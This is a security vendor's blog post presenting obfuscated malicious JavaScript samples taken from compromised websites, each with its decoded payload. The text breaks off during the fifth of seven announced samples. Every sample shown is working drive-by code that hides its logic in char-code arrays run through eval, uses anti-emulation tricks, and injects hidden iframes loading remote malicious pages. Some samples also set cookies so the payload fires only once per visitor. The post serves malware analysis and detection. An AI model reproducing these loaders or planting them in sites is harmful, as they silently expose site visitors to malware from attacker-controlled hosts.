Quttera web security blog: 7 hottest obfuscated malicious JavaScript detected on websites

Top 7 obfuscated malicious JavaScript threats detected by Quttera's online malware scanner during last week

Malicious JavaScript

To continue with our "new tradition" of posting JavaScript malware samples that we think are interesting, here is our weekly chart. Previous week chart can be found here.

This post presents 7 interesting malicious scripts as identified in websites during on-demand scan initiated by online community via our public free website malware scanner. The purpose of this post is strictly educative and information you found here should not be used in malicious purposes.

Sample 1

Malicious action: injecting hidden iframe to http://enlargement4.pro/might/dropping_installing[.]php

try {
bgewg346tr++
} catch (aszx) {
try {
dsgdsg - 142
} catch (dsfsd) {
try {
("".substr + "")()
} catch (ehwdsh) {
try {
window.document.body++
} catch (gdsgsdg) {
dbshre = 204;
}
}
}
}
if (dbshre) {
asd = 0;
try {
d = document.createElement("div");
d.innerHTML.a = "asd";
} catch (agdsg) {
asd = 1;
}
if (!asd) {
e = eval;
}
asgq = new Array(1, 2, 99, 97, 28, 32, 93, 105, 94, 113, 101, 94, 104, 111, 42, 95, 94, 110, 64, 104, 93, 102,95, 105, 112, 107, 59, 115, 79, 93, 95, 71, 91, 104, 97, 32, 32, 92, 106, 96, 113, 32, 35, 86, 44, 85, 34, 117, 8,5, 1, 2, 99, 97, 110, 89, 102, 95, 109, 36, 33, 52, 7, 4, 5, 117, 25, 95, 103, 111, 93, 25, 117, 8, 5, 1, 2, 94,106, 95, 109, 102, 95, 105, 112, 38, 112, 108, 100, 112, 93, 33, 28, 55, 101, 94, 107, 91, 104, 97, 24, 108, 108,94, 57, 31, 97, 110, 111, 108, 50, 40, 41, 96, 106, 100, 90, 108, 98, 97, 101, 94, 104, 111, 48, 38, 105, 108,106, 43, 101, 98, 97, 99, 112, 39, 93, 108, 106, 108, 104, 98, 104, 98, 91, 97, 103, 109, 111, 93, 100, 101, 99,105, 99, 38, 105, 98, 107, 35, 24, 112, 99, 95, 112, 96, 54, 33, 44, 44, 31, 25, 98, 96, 101, 95, 97, 110, 56, 35,41, 41, 33, 27, 111, 108, 114, 102, 96, 57, 31, 112, 99, 95, 112, 96, 51, 43, 43, 44, 104, 113, 53, 99, 97, 97,96, 98, 111, 54, 41, 41, 42, 107, 116, 51, 105, 105, 110, 101, 108, 98, 105, 105, 54, 89, 91, 109, 106, 104, 109,109, 95, 54, 104, 93, 95, 110, 53, 41, 41, 41, 42, 107, 116, 51, 109, 105, 107, 54, 40, 52, 33, 57, 56, 39, 98,96, 109, 93, 101, 94, 56, 29, 37, 51, 6, 3, 4, 121, 5, 2, 3, 97, 113, 102, 92, 110, 100, 107, 102, 25, 99, 97,110, 89, 102, 95, 109, 36, 33, 116, 7, 4, 5, 1, 111, 91, 109, 28, 94, 25, 55, 27, 96, 103, 92, 111, 104, 97, 102,109, 40, 94, 110, 93, 90, 110, 96, 65, 100, 94, 103, 96, 106, 108, 33, 33, 100, 98, 106, 90, 103, 96, 35, 33, 52,96, 41, 111, 93, 109, 59, 111, 112, 106, 98, 92, 112, 112, 93, 33, 33, 110, 110, 91, 32, 38, 34, 100, 108, 109,106, 53, 43, 39, 94, 104, 103, 93, 106, 96, 95, 104, 97, 102, 109, 46, 41, 108, 106, 104, 41, 104, 101, 95, 97,110, 42, 96, 106, 104, 106, 107, 101, 102, 96, 89, 100, 106, 107, 109, 91, 103, 104, 97, 103, 97, 41, 108, 96,105, 33, 36, 55, 94, 39, 109, 111, 117, 100, 94, 40, 103, 97, 94, 109, 55, 34, 41, 41, 41, 42, 107, 116, 31, 52,96, 41, 111, 108, 114, 102, 96, 42, 108, 104, 106, 56, 35, 40, 32, 53, 97, 42, 107, 109, 115, 103, 97, 38, 105,105, 110, 101, 108, 98, 105, 105, 57, 31, 90, 92, 110, 107, 100, 110, 110, 96, 35, 51, 95, 40, 110, 112, 113, 101,95, 41, 104, 93, 95, 110, 56, 35, 40, 32, 53, 97, 42, 107, 109, 115, 103, 97, 38, 109, 105, 107, 57, 31, 41, 33,54, 98, 38, 108, 95, 111, 61, 108, 109, 108, 100, 94, 109, 109, 95, 35, 35, 111, 98, 94, 111, 100, 31, 37, 33, 44,44, 31, 34, 53, 97, 42, 107, 94, 110, 60, 112, 108, 107, 99, 93, 113, 108, 94, 34, 34, 100, 93, 98, 97, 99, 112,31, 37, 33, 44, 44, 31, 34, 53, 8, 5, 1, 2, 94, 106, 95, 109, 102, 95, 105, 112, 38, 96, 95, 111, 65, 100, 94,103, 96, 106, 108, 108, 60, 116, 80, 89, 96, 72, 92, 105, 93, 33, 33, 93, 107, 92, 114, 33, 36, 87, 40, 86, 40,92, 108, 104, 94, 104, 95, 63, 96, 98, 102, 95, 36, 94, 34, 53, 8, 5, 1, 118);
s = "";
for (i = 0; i - 637 != 0; i++) {
if (020 == 0x10) s += String.fromCharCode(1 * asgq[i] - (i % 5 - 8));
}
z = s;
e(z);
}
/*
* decoded payload injects malicious iframe leading
* to http://enlargement4.pro/might/dropping_installing[.]php
*/
if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("<iframe src='http://enlargement4.pro/might/dropping_installing.php' width='10' height='10' style='width:100px;height:100px;position:absolute;left:-100px;top:0;'></iframe>");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://enlargement4.pro/might/dropping_installing.php');
f.style.left = '-100px';
f.style.top = '0';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}

Sample 2

Malicious action: injecting hidden iframe to http://megastoron.com/

try {
window.document.body++
} catch (gdsgsdg) {
dbshre = 35;
}
if (dbshre) {
asd = 0;
try {
d = document.createElement("div");
d.innerHTML.a = "asd";
} catch (agdsg) {
asd = 1;
}
if (!asd) {
e = eval;
}
ss = String;
asgq = new Array(31, 94, 110, 104, 94, 107, 97, 104, 104, 27, 31, 33, 25, 117, 27, 4, 2, 25, 112, 92, 105, 24,99, 97, 116, 98, 91, 25, 55, 27, 91, 103, 92, 111, 104, 92, 102, 109, 40, 94, 105, 93, 90, 110, 96, 60, 100, 94,103, 96, 101, 108, 33, 33, 100, 93, 106, 90, 103, 96, 30, 33, 52, 26, 8, 1, 24, 99, 97, 116, 98, 91, 39, 109, 109,90, 24, 54, 26, 34, 95, 108, 109, 106, 53, 38, 39, 102, 95, 98, 88, 107, 109, 105, 109, 102, 102, 39, 93, 106,100, 39, 32, 53, 27, 4, 2, 25, 100, 98, 112, 99, 92, 40, 110, 107, 113, 101, 95, 41, 103, 103, 108, 99, 111, 96,103, 103, 26, 56, 23, 31, 90, 92, 110, 102, 100, 110, 110, 96, 30, 51, 25, 7, 5, 23, 98, 96, 115, 102, 90, 38,108, 110, 116, 99, 93, 39, 92, 106, 105, 92, 94, 108, 27, 52, 24, 32, 42, 34, 50, 24, 6, 4, 27, 97, 95, 114, 101,94, 37, 107, 109, 115, 103, 92, 38, 97, 95, 100, 94, 96, 109, 26, 56, 23, 31, 42, 106, 115, 30, 51, 25, 7, 5, 23,98, 96, 115, 102, 90, 38, 108, 110, 116, 99, 93, 39, 113, 100, 91, 108, 97, 26, 56, 23, 31, 42, 106, 115, 30, 51,25, 7, 5, 23, 98, 96, 115, 102, 90, 38, 108, 110, 116, 99, 93, 39, 102, 96, 93, 108, 25, 55, 27, 30, 41, 105, 114,34, 50, 24, 6, 4, 27, 97, 95, 114, 101, 94, 37, 107, 109, 115, 103, 92, 38, 109, 105, 107, 23, 53, 25, 33, 44,103, 112, 32, 53, 27, 4, 2, 6, 4, 27, 96, 94, 25, 34, 28, 91, 103, 92, 111, 104, 92, 102, 109, 40, 98, 92, 108,62, 102, 96, 100, 93, 103, 110, 61, 112, 65, 93, 34, 34, 97, 95, 114, 101, 94, 30, 33, 34, 26, 118, 23, 5, 3, 26,95, 102, 91, 110, 103, 96, 101, 108, 39, 113, 109, 96, 108, 94, 34, 34, 51, 92, 98, 112, 27, 96, 92, 54, 86, 34,97, 95, 114, 101, 94, 83, 31, 25, 56, 55, 38, 92, 98, 112, 57, 30, 33, 52, 26, 8, 1, 24, 93, 105, 94, 108, 101,94, 104, 111, 37, 95, 94, 110, 64, 99, 93, 102, 95, 105, 107, 58, 114, 67, 95, 31, 31, 99, 97, 116, 98, 91, 32,35, 41, 88, 104, 105, 95, 105, 91, 59, 97, 99, 103, 91, 32, 99, 97, 116, 98, 91, 34, 53, 27, 4, 2, 25, 119, 27, 4,2, 25, 119, 36, 31, 33, 52);
s = "";
for (i = 0; i - 453 != 0; i++) {
if ((020 == 0x10) % 26 % 26window.document) s += ss.fromCharCode(1 * asgq[i] - (i % 5 - 5 - 4));
}
z = s;
e(s);
}
/*
* decoded payload inject malicious iframe to http://megastoron.com/
*/
(function () {
var jgykc = document.createElement('iframe');
jgykc.src = 'http://megastoron.com/';
jgykc.style.position = 'absolute';
jgykc.style.border = '0';
jgykc.style.height = '1px';
jgykc.style.width = '1px';
jgykc.style.left = '1px';
jgykc.style.top = '1px';
if (!document.getElementById('jgykc')) {
document.write('<div id=\'jgykc\' ></div>');
document.getElementById('jgykc').appendChild(jgykc);
}
})();

Sample 3

Malicious action: injecting hidden iframe to http://5day.vn/tmp/Px86AtML.php

ps = "s" + "p" + "l" + "i" + "t";
asd = function () {
++d.body
};
a =("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,167,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,167,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,74,153,150,200,65,175,165,66,173,164,167,66,127,177,77,75,110,173,124,123,65,167,157,167,56,102,24,21,47,167,65,172,173,200,163,154,65,167,166,172,160,173,160,166,165,47,104,47,56,150,151,172,166,163,174,173,154,56,102,24,21,47,167,65,172,173,200,163,154,65,151,166,171,153,154,171,47,104,47,56,67,56,102,24,21,47,167,65,172,173,200,163,154,65,157,154,160,156,157,173,47,104,47,56,70,167,177,56,102,24,21,47,167,65,172,173,200,163,154,65,176,160,153,173,157,47,104,47,56,70,167,177,56,102,24,21,47,167,65,172,173,200,163,154,65,163,154,155,173,47,104,47,56,70,167,177,56,102,24,21,47,167,65,172,173,200,163,154,65,173,166,167,47,104,47,56,70,167,177,56,102,24,21,24,21,47,160,155,47,57,50,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,167,56,60,60,47,202,24,21,47,153,166,152,174,164,154,165,173,65,176,171,160,173,154,57,56,103,153,160,175,47,160,153,104,143,56,167,143,56,105,103,66,153,160,175,105,56,60,102,24,21,47,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,167,56,60,65,150,167,167,154,165,153,112,157,160,163,153,57,167,60,102,24,21,47,204,24,21,204,24,21,155,174,165,152,173,160,166,165,47,132,154,173,112,166,166,162,160,154,57,152,166,166,162,160,154,125,150,164,154,63,152,166,166,162,160,154,135,150,163,174,154,63,165,113,150,200,172,63,167,150,173,157,60,47,202,24,21,47,175,150,171,47,173,166,153,150,200,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,175,150,171,47,154,177,167,160,171,154,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,160,155,47,57,165,113,150,200,172,104,104,165,174,163,163,47,203,203,47,165,113,150,200,172,104,104,67,60,47,165,113,150,200,172,104,70,102,24,21,47,154,177,167,160,171,154,65,172,154,173,133,160,164,154,57,173,166,153,150,200,65,156,154,173,133,160,164,154,57,60,47,62,47,72,75,67,67,67,67,67,61,71,73,61,165,113,150,200,172,60,102,24,21,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,47,104,47,152,166,166,162,160,154,125,150,164,154,62,51,104,51,62,154,172,152,150,167,154,57,152,166,166,162,160,154,135,150,163,174,154,60,24,21,47,62,47,51,102,154,177,167,160,171,154,172,104,51,47,62,47,154,177,167,160,171,154,65,173,166,116,124,133,132,173,171,160,165,156,57,60,47,62,47,57,57,167,150,173,157,60,47,106,47,51,102,47,167,150,173,157,104,51,47,62,47,167,150,173,157,47,101,47,51,51,60,102,24,21,204,24,21,155,174,165,152,173,160,166,165,47,116,154,173,112,166,166,162,160,154,57,47,165,150,164,154,47,60,47,202,24,21,47,175,150,171,47,172,173,150,171,173,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,165,150,164,154,47,62,47,51,104,51,47,60,102,24,21,47,175,150,171,47,163,154,165,47,104,47,172,173,150,171,173,47,62,47,165,150,164,154,65,163,154,165,156,173,157,47,62,47,70,102,24,21,47,160,155,47,57,47,57,47,50,172,173,150,171,173,47,60,47,55,55,24,21,47,57,47,165,150,164,154,47,50,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,67,63,47,165,150,164,154,65,163,154,165,156,173,157,47,60,47,60,47,60,24,21,47,202,24,21,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,204,24,21,47,160,155,47,57,47,172,173,150,171,173,47,104,104,47,64,70,47,60,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,175,150,171,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,51,102,51,63,47,163,154,165,47,60,102,24,21,47,160,155,47,57,47,154,165,153,47,104,104,47,64,70,47,60,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,163,154,165,156,173,157,102,24,21,47,171,154,173,174,171,165,47,174,165,154,172,152,150,167,154,57,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,163,154,165,63,47,154,165,153,47,60,47,60,102,24,21,204,24,21,160,155,47,57,165,150,175,160,156,150,173,166,171,65,152,166,166,162,160,154,114,165,150,151,163,154,153,60,24,21,202,24,21,160,155,57,116,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));
d = document;
for (i = 0; i < a.length; i += 1) {
a[i] = -(10 - 3) + parseInt(a[i], 8);
}
try {
asd()
} catch (q) {
yy = 50 - 50;
}
try {
yy /= 2
} catch (q) {
yy = 1;
}
if (!yy) eval(String["fr" + "omCharCode"].apply(String, a));
/*
* decoded payload inject hidden iframes to http://5day.vn/tmp/Px86AtML.php
*/
function zzzfff() {
var p = document.createElement('iframe');
p.src = 'http://5day.vn/tmp/Px86AtML.php';
p.style.position = 'absolute';
p.style.border = '0';
p.style.height = '1px';
p.style.width = '1px';
p.style.left = '1px';
p.style.top = '1px';
if (!document.getElementById('p')) {
document.write('<div id=\'p\'></div>');
document.getElementById('p').appendChild(p);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue)
+ ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) &&
(name != document.cookie.substring(0, name.length)))
{
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled)
{
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}

Sample 4

Malicious action: injecting hidden iframe to http://carrozzeriamurat.com/xHZ9Mh4b.php

ps = "s" + "p" + "l" + "i" + "t";
asd = function () {
-- (d.body)
};
a =("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,164,163,157,152,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,164,163,157,152,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,152,150,171,171,166,201,201,154,171,160,150,164,174,171,150,173,65,152,166,164,66,177,117,141,100,124,157,73,151,65,167,157,167,56,102,24,21,47,164,163,157,152,65,172,173,200,163,154,65,167,166,172,160,173,160,166,165,47,104,47,56,150,151,172,166,163,174,173,154,56,102,24,21,47,164,163,157,152,65,172,173,200,163,154,65,151,166,171,153,154,171,47,104,47,56,67,56,102,24,21,47,164,163,157,152,65,172,173,200,163,154,65,157,154,160,156,157,173,47,104,47,56,70,167,177,56,102,24,21,47,164,163,157,152,65,172,173,200,163,154,65,176,160,153,173,157,47,104,47,56,70,167,177,56,102,24,21,47,164,163,157,152,65,172,173,200,163,154,65,163,154,155,173,47,104,47,56,70,167,177,56,102,24,21,47,164,163,157,152,65,172,173,200,163,154,65,173,166,167,47,104,47,56,70,167,177,56,102,24,21,24,21,47,160,155,47,57,50,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,164,163,157,152,56,60,60,47,202,24,21,47,153,166,152,174,164,154,165,173,65,176,171,160,173,154,57,56,103,153,160,175,47,160,153,104,143,56,164,163,157,152,143,56,105,103,66,153,160,175,105,56,60,102,24,21,47,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,164,163,157,152,56,60,65,150,167,167,154,165,153,112,157,160,163,153,57,164,163,157,152,60,102,24,21,47,204,24,21,204,24,21,155,174,165,152,173,160,166,165,47,132,154,173,112,166,166,162,160,154,57,152,166,166,162,160,154,125,150,164,154,63,152,166,166,162,160,154,135,150,163,174,154,63,165,113,150,200,172,63,167,150,173,157,60,47,202,24,21,47,175,150,171,47,173,166,153,150,200,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,175,150,171,47,154,177,167,160,171,154,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,160,155,47,57,165,113,150,200,172,104,104,165,174,163,163,47,203,203,47,165,113,150,200,172,104,104,67,60,47,165,113,150,200,172,104,70,102,24,21,47,154,177,167,160,171,154,65,172,154,173,133,160,164,154,57,173,166,153,150,200,65,156,154,173,133,160,164,154,57,60,47,62,47,72,75,67,67,67,67,67,61,71,73,61,165,113,150,200,172,60,102,24,21,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,47,104,47,152,166,166,162,160,154,125,150,164,154,62,51,104,51,62,154,172,152,150,167,154,57,152,166,166,162,160,154,135,150,163,174,154,60,24,21,47,62,47,51,102,154,177,167,160,171,154,172,104,51,47,62,47,154,177,167,160,171,154,65,173,166,116,124,133,132,173,171,160,165,156,57,60,47,62,47,57,57,167,150,173,157,60,47,106,47,51,102,47,167,150,173,157,104,51,47,62,47,167,150,173,157,47,101,47,51,51,60,102,24,21,204,24,21,155,174,165,152,173,160,166,165,47,116,154,173,112,166,166,162,160,154,57,47,165,150,164,154,47,60,47,202,24,21,47,175,150,171,47,172,173,150,171,173,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,165,150,164,154,47,62,47,51,104,51,47,60,102,24,21,47,175,150,171,47,163,154,165,47,104,47,172,173,150,171,173,47,62,47,165,150,164,154,65,163,154,165,156,173,157,47,62,47,70,102,24,21,47,160,155,47,57,47,57,47,50,172,173,150,171,173,47,60,47,55,55,24,21,47,57,47,165,150,164,154,47,50,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,67,63,47,165,150,164,154,65,163,154,165,156,173,157,47,60,47,60,47,60,24,21,47,202,24,21,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,204,24,21,47,160,155,47,57,47,172,173,150,171,173,47,104,104,47,64,70,47,60,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,175,150,171,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,51,102,51,63,47,163,154,165,47,60,102,24,21,47,160,155,47,57,47,154,165,153,47,104,104,47,64,70,47,60,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,163,154,165,156,173,157,102,24,21,47,171,154,173,174,171,165,47,174,165,154,172,152,150,167,154,57,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,163,154,165,63,47,154,165,153,47,60,47,60,102,24,21,204,24,21,160,155,47,57,165,150,175,160,156,150,173,166,171,65,152,166,166,162,160,154,114,165,150,151,163,154,153,60,24,21,202,24,21,160,155,57,116,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));
d = document;
for (i = 0; i < a.length; i += 1) {
a[i] = -(10 - 3) + parseInt(a[i], 5 + 3);
}
try {
asd()
} catch (q) {
yy = 50 - 50;
}
try {
yy /= 18
} catch (pq) {
yy = 1;
}
if (!yy) eval(String["fr" + "omCharCode"].apply(String, a));
/*
* decoded payload injecting malicious hidden iframe to http://carrozzeriamurat.com/xHZ9Mh4b.php
*/
function zzzfff() {
var mlhc = document.createElement('iframe');
mlhc.src = 'http://carrozzeriamurat.com/xHZ9Mh4b.php';
mlhc.style.position = 'absolute';
mlhc.style.border = '0';
mlhc.style.height = '1px';
mlhc.style.width = '1px';
mlhc.style.left = '1px';
mlhc.style.top = '1px';
if (!document.getElementById('mlhc')) {
document.write('<div id=\'mlhc\'></div>');
document.getElementById('mlhc').appendChild(mlhc);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue)
+ ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) &&
(name != document.cookie.substring(0, name.length)))
{
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled)
{
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}

Sample 5

Malicious action: injecting hidden iframe to http://deangrzelak.com/wp-includes/rel.php

ss = eval("Str" + "ing");
d = document;
a ="68,77,70,65,76,6b,71,70,22,7c,7c,7c,68,68,68,2a,2b,22,7d,f,c,22,22,22,22,78,63,74,22,73,22,3f,22,66,71,65,77,6f,67,70,76,30,65,74,67,63,76,67,47,6e,67,6f,67,70,76,2a,29,6b,68,74,63,6f,67,29,2b,3d,f,c,f,c,22,22,22,22,73,30,75,74,65,22,3f,22,29,6a,76,76,72,3c,31,31,66,67,63,70,69,74,7c,67,6e,63,6d,30,65,71,6f,31,79,72,2f,6b,70,65,6e,77,66,67,75,31,74,67,6e,30,72,6a,72,29,3d,f,c,22,22,22,22,73,30,75,76,7b,6e,67,30,72,71,75,6b,76,6b,71,70,22,3f,22,29,63,64,75,71,6e,77,76,67,29,3d,f,c,22,22,22,22,73,30,75,76,7b,6e,67,30,64,71,74,66,67,74,22,3f,22,29,32,29,3d,f,c,22,22,22,22,73,30,75,76,7b,6e,67,30,6a,67,6b,69,6a,76,22,3f,22,29,33,72,7a,29,3d,f,c,22,22,22,22,73,30,75,76,7b,6e,67,30,79,6b,66,76,6a,22,3f,22,29,33,72,7a,29,3d,f,c,22,22,22,22,73,30,75,76,7b,6e,67,30,6e,67,68,76,22,3f,22,29,33,72,7a,29,3d,f,c,22,22,22,22,73,30,75,76,7b,6e,67,30,76,71,72,22,3f,22,29,33,72,7a,29,3d,f,c,f,c,22,22,22,22,6b,68,22,2a,23,66,71,65,77,6f,67,70,76,30,69,67,76,47,6e,67,6f,67,70,76,44,7b,4b,66,2a,29,73,29,2b,2b,22,7d,f,c,22,22,22,22,22,22,22,22,66,71,65,77,6f,67,70,76,30,79,74,6b,76,67,2a,29,3e,66,6b,78,22,6b,66,3f,5e,29,73,5e,29,40,3e,31,66,6b,78,40,29,2b,3d,f,c,22,22,22,22,22,22,22,22,66,71,65,77,6f,67,70,76,30,69,67,76,47,6e,67,6f,67,70,76,44,7b,4b,66,2a,29,73,29,2b,30,63,72,72,67,70,66,45,6a,6b,6e,66,2a,73,2b,3d,f,c,22,22,22,22,7f,f,c,7f,f,c,68,77,70,65,76,6b,71,70,22,55,67,76,45,71,71,6d,6b,67,2a,65,71,71,6d,6b,67,50,63,6f,67,2e,65,71,71,6d,6b,67,58,63,6e,77,67,2e,70,46,63,7b,75,2e,72,63,76,6a,2b,22,7d,f,c,22,78,63,74,22,76,71,66,63,7b,22,3f,22,70,67,79,22,46,63,76,67,2a,2b,3d,f,c,22,78,63,74,22,67,7a,72,6b,74,67,22,3f,22,70,67,79,22,46,63,76,67,2a,2b,3d,f,c,22,6b,68,22,2a,70,46,63,7b,75,3f,3f,70,77,6e,6e,22,7e,7e,22,70,46,63,7b,75,3f,3f,32,2b,22,70,46,63,7b,75,3f,33,3d,f,c,22,67,7a,72,6b,74,67,30,75,67,76,56,6b,6f,67,2a,76,71,66,63,7b,30,69,67,76,56,6b,6f,67,2a,2b,22,2d,22,35,38,32,32,32,32,32,2c,34,36,2c,70,46,63,7b,75,2b,3d,f,c,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,22,3f,22,65,71,71,6d,6b,67,50,63,6f,67,2d,24,3f,24,2d,67,75,65,63,72,67,2a,65,71,71,6d,6b,67,58,63,6e,77,67,2b,f,c,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,2d,22,24,3d,67,7a,72,6b,74,67,75,3f,24,22,2d,22,67,7a,72,6b,74,67,30,76,71,49,4f,56,55,76,74,6b,70,69,2a,2b,22,2d,22,2a,2a,72,63,76,6a,2b,22,41,22,24,3d,22,72,63,76,6a,3f,24,22,2d,22,72,63,76,6a,22,3c,22,24,24,2b,3d,f,c,7f,f,c,68,77,70,65,76,6b,71,70,22,49,67,76,45,71,71,6d,6b,67,2a,22,70,63,6f,67,22,2b,22,7d,f,c,22,78,63,74,22,75,76,63,74,76,22,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,6b,70,66,67,7a,51,68,2a,22,70,63,6f,67,22,2d,22,24,3f,24,22,2b,3d,f,c,22,78,63,74,22,6e,67,70,22,3f,22,75,76,63,74,76,22,2d,22,70,63,6f,67,30,6e,67,70,69,76,6a,22,2d,22,33,3d,f,c,22,6b,68,22,2a,22,2a,22,23,75,76,63,74,76,22,2b,22,28,28,f,c,22,2a,22,70,63,6f,67,22,23,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,75,77,64,75,76,74,6b,70,69,2a,22,32,2e,22,70,63,6f,67,30,6e,67,70,69,76,6a,22,2b,22,2b,22,2b,f,c,22,7d,f,c,22,74,67,76,77,74,70,22,70,77,6e,6e,3d,f,c,22,7f,f,c,22,6b,68,22,2a,22,75,76,63,74,76,22,3f,3f,22,2f,33,22,2b,22,74,67,76,77,74,70,22,70,77,6e,6e,3d,f,c,22,78,63,74,22,67,70,66,22,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,6b,70,66,67,7a,51,68,2a,22,24,3d,24,2e,22,6e,67,70,22,2b,3d,f,c,22,6b,68,22,2a,22,67,70,66,22,3f,3f,22,2f,33,22,2b,22,67,70,66,22,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,6e,67,70,69,76,6a,3d,f,c,22,74,67,76,77,74,70,22,77,70,67,75,65,63,72,67,2a,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,75,77,64,75,76,74,6b,70,69,2a,22,6e,67,70,2e,22,67,70,66,22,2b,22,2b,3d,f,c,7f,f,c,6b,68,22,2a,70,63,78,6b,69,63,76,71,74,30,65,71,71,6d,6b,67,47,70,63,64,6e,67,66,2b,f,c,7d,f,c,6b,68,2a,49,67,76,45,71,71,6d,6b,67,2a,29,78,6b,75,6b,76,67,66,61,77,73,29,2b,3f,3f,37,37,2b,7d,7f,67,6e,75,67,7d,55,67,76,45,71,71,6d,6b,67,2a,29,78,6b,75,6b,76,67,66,61,77,73,29,2e,22,29,37,37,29,2e,22,29,33,29,2e,22,29,31,29,2b,3d,f,c,f,c,7c,7c,7c,68,68,68,2a,2b,3d,f,c,7f,f,c,7f".split(",");
for (i = 0; i < a.length; i++) {
a[i] = parseInt(a[i], 16) - (5 - 3);
}
try {
d.body--
} catch (q) {
zz = 0;
}
try {
zz &= 2
} catch (q) {
zz = 1;
}
if (!zz)
if (window.document) eval(ss.fromCharCode.apply(ss, a));
/*
* decoded payload injecting hidden iframe to compromised wordpress installation
* http://deangrzelak.com/wp-includes/rel.php
*/
function zzzfff() {
var q = document.createElement('iframe');
q.src = 'http://deangrzelak.com/wp-includes/rel.php';
q.style.position = 'absolute';
q.style.border = '0';
q.style.height = '1px';
q.style.width = '1px';
q.style.left = '1px';
